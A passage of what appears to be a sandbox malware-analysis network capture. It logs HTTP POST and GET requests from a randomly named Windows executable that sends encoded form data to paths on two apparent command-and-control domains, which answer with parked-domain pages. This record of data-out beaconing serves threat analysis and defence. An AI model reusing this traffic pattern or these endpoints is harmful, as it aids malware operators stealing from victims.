                      Jul 2, 2024 07:16:52.215553999 CEST1236INData Raw: 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61
                      Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
                      Jul 2, 2024 07:16:52.215564966 CEST1236INData Raw: 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 69 61 20 43 75 73 74 6f 6d 65 72 20
                      Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
                      Jul 2, 2024 07:16:52.215574026 CEST654INData Raw: 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72 20 77 65 62 20 68 6f 73 74 69 6e 67
                      Data Ascii: m_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loopia.se?utm_me


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      18192.168.2.549730194.9.94.85806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:16:54.138571024 CEST819OUTPOST /4hda/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.xn--matfrmn-jxa4m.se
                      Origin: http://www.xn--matfrmn-jxa4m.se
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 37 74 76 75 57 57 65 48 4d 6a 78 6b 4d 46 37 55 41 6c 75 6c 72 36 58 59 2f 34 57 53 79 56 51 4d 36 6d 44 79 55 74 6d 2b 44 43 78 4d 6e 55 30 68 4a 52 6f 7a 71 4b 35 33 51 76 42 74 44 32 32 64 2b 72 6e 7a 53 43 32 63 33 4b 62 50 65 37 75 41 6a 33 45 6a 56 46 57 5a 73 7a 53 55 34 57 45 71 33 4b 6b 6b 30 43 4c 59 50 6a 4f 5a 4f 74 58 69 36 6e 50 49 45 35 51 50 4b 4a 52 72 6f 2f 4e 74 6d 6c 48 73 73 4f 38 70 34 50 2f 67 43 4e 6d 41 79 6d 6f 69 6c 75 42 6c 38 33 43 54 39 49 54 7a 6b 49 31 39 71 4c 6a 75 45 6c 70 6d 47 39 66 78 79 45
                      Data Ascii: 66s0QHx=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boF7tvuWWeHMjxkMF7UAlulr6XY/4WSyVQM6mDyUtm+DCxMnU0hJRozqK53QvBtD22d+rnzSC2c3KbPe7uAj3EjVFWZszSU4WEq3Kkk0CLYPjOZOtXi6nPIE5QPKJRro/NtmlHssO8p4P/gCNmAymoiluBl83CT9ITzkI19qLjuElpmG9fxyE
                      Jul 2, 2024 07:16:54.800302982 CEST1236INHTTP/1.1 200 OK
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:16:54 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      X-Powered-By: PHP/8.1.24
                      Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                      Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                      Jul 2, 2024 07:16:54.800349951 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                      Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                      Jul 2, 2024 07:16:54.800360918 CEST448INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                      Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                      Jul 2, 2024 07:16:54.800647020 CEST1236INData Raw: 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 68 32 3e 0a 09 09 09 3c 70 3e 50 72 6f 74 65 63 74 20 79 6f 75 72 20
                      Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
                      Jul 2, 2024 07:16:54.800657034 CEST1236INData Raw: 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e
                      Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to get started with you
                      Jul 2, 2024 07:16:54.801012993 CEST430INData Raw: 77 77 2e 6c 6f 6f 70 69 61 2e 73 65 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67
                      Data Ascii: ww.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https://www.loopia.com/support?


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      19192.168.2.549731194.9.94.85806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:16:56.670464039 CEST1836OUTPOST /4hda/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.xn--matfrmn-jxa4m.se
                      Origin: http://www.xn--matfrmn-jxa4m.se
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 6a 74 76 62 43 57 66 6b 30 6a 77 6b 4d 46 67 55 42 69 75 6c 71 34 58 59 33 38 57 53 2b 76 51 4f 53 6d 43 58 41 74 6b 4c 33 43 6f 38 6e 55 32 68 4a 51 73 7a 72 65 35 33 41 72 42 74 7a 32 32 64 2b 72 6e 78 4b 43 67 2b 66 4b 55 76 66 4a 70 41 6a 7a 54 7a 55 69 57 5a 31 4c 53 55 38 73 45 61 58 4b 6b 41 51 43 59 4c 33 6a 4e 35 4f 76 51 69 37 69 50 49 4a 35 51 4f 6e 6c 52 75 55 56 4e 76 47 6c 57 35 49 52 6a 49 38 4f 71 67 47 4b 73 68 32 52 76 32 56 51 66 30 77 42 44 7a 68 38 64 7a 30 46 79 71 2b 6f 72 50 31 62 38 69 50 6d 65 6d 33 2f 67 39 35 74 5a 36 67 45 4f 59 45 77 42 41 64 6d 7a 78 42 78 67 42 2b 79 2f 55 51 6e 73 2f 63 77 4f 67 75 50 70 58 4a 32 45 52 42 78 61 71 6a 31 65 36 47 45 67 46 46 41 32 51 54 4d 33 35 4b 37 39 55 7a 76 74 4a 49 48 58 51 79 46 65 6d 65 52 6c 4e 46 67 6f 33 64 6e 31 55 6c 6a 30 43 32 6b 38 6f 4b 54 5a 32 4a 70 6e 75 67 58 6b 51 [TRUNCATED]
                      Data Ascii: 66s0QHx=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boFjtvbCWfk0jwkMFgUBiulq4XY38WS+vQOSmCXAtkL3Co8nU2hJQszre53ArBtz22d+rnxKCg+fKUvfJpAjzTzUiWZ1LSU8sEaXKkAQCYL3jN5OvQi7iPIJ5QOnlRuUVNvGlW5IRjI8OqgGKsh2Rv2VQf0wBDzh8dz0Fyq+orP1b8iPmem3/g95tZ6gEOYEwBAdmzxBxgB+y/UQns/cwOguPpXJ2ERBxaqj1e6GEgFFA2QTM35K79UzvtJIHXQyFemeRlNFgo3dn1Ulj0C2k8oKTZ2JpnugXkQIw+UcWkSqggKaSzOp/KNFfQMsrNAJXV4YZrrxFePPINFPpP2ZR7X1SQ+8jwyUGRvrriVKdYzXldKKzrIDDAsmpI48hbOb0rzsNZBs/IXTWPn73fJlvVnoMLFnmJexhRdIa/pffmcmUKe1UFxM0t+OWt3o7SVflYstWcoAytbQdatTBXOFloOrODQiS0VpQdn2JiOGw+fU73BqSpEXfo4Kf3pq5XF84UZyOwtEYwNd99jHmZO2Dlsz7QQiNHwPKo/qCZfUaBreOOoVawAWhauUbAth1yPro29MpIePFqIT0sQLYjAjvFSKqy7BRPzoLzsEPoP8k9aItYgxyMTtalqe8p9YnXW3JcK90dX121TR7it8YZtWxe1n6qYpuOT+qyx5UC3QnQs8ETL/E+a90eFm9sZU8YSSXNdq0RYG4j+XdN9eMrTRFhGPOQ9HeikR9rPWF5fD/1jUcY4ojR5a8tfkKX1R0pup4F1MdyCumAjLftXHY2rDiGuf034OKnMQw/7V4sOUTaTNFYklAYrk5PHdPKbKAWhqD/JTP+/ZQYlqnzSFVyRGd5SY48pQxSEkcFPN4A5IMa7SCagFXWzQJ6uLspYUeXisXH1SgvMR0wR8axj2zucR2cFQcvBYclty2+4OXWc20eUvhFVR48YS/ndoJNwcF7zcU0LXr [TRUNCATED]
                      Jul 2, 2024 07:16:57.316021919 CEST1236INHTTP/1.1 200 OK
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:16:57 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      X-Powered-By: PHP/8.1.24
                      Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                      Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                      Jul 2, 2024 07:16:57.316099882 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                      Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                      Jul 2, 2024 07:16:57.316111088 CEST1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                      Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                      Jul 2, 2024 07:16:57.316479921 CEST1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                      Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                      Jul 2, 2024 07:16:57.316494942 CEST878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                      Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      20192.168.2.549732194.9.94.85806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:16:59.203165054 CEST530OUTGET /4hda/?66s0QHx=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG94cDJ5htquBO11HcjCOymydCfo0q1+e/CBcncmTCUQD5IVA==&Jjv=GpKhRVSHzLA8j4R HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.xn--matfrmn-jxa4m.se
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:16:59.856921911 CEST1236INHTTP/1.1 200 OK
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:16:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      X-Powered-By: PHP/8.1.24
                      Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                      Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                      Jul 2, 2024 07:16:59.857026100 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                      Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                      Jul 2, 2024 07:16:59.857038021 CEST1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                      Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                      Jul 2, 2024 07:16:59.857423067 CEST1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                      Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                      Jul 2, 2024 07:16:59.857435942 CEST878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                      Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      21192.168.2.54973323.251.54.212806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:17:05.560895920 CEST766OUTPOST /li0t/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.anuts.top
                      Origin: http://www.anuts.top
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.anuts.top/li0t/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 70 6e 2f 79 52 51 68 59 6a 4a 62 56 56 49 73 68 33 32 4a 64 46 4f 30 53 53 6d 4e 55 33 75 52 57 53 6e 37 78 33 42 46 69 48 55 6a 50 69 38 6c 34 43 4b 6d 75 66 75 43 70 6b 77 63 2b 67 37 6f 2b 46 65 61 43 76 6f 35 65 76 79 6e 69 55 72 38 54 4d 6a 4a 78 75 42 41 46 70 53 35 45 61 45 56 68 35 7a 43 69 47 38 43 70 46 4b 4c 75 77 54 58 69 36 6b 6c 79 32 4a 4a 4e 33 41 73 53 42 37 67 65 73 31 75 74 70 77 31 35 6b 39 55 47 55 73 35 54 35 59 39 6c 33 66 30 55 61 46 69 63 74 46 74 62 79 39 70 78 74 51 74 48 6c 62 54 78 39 63 6f 72 49 6b 77 45 41 6b 77 67 4e 66 67 3d
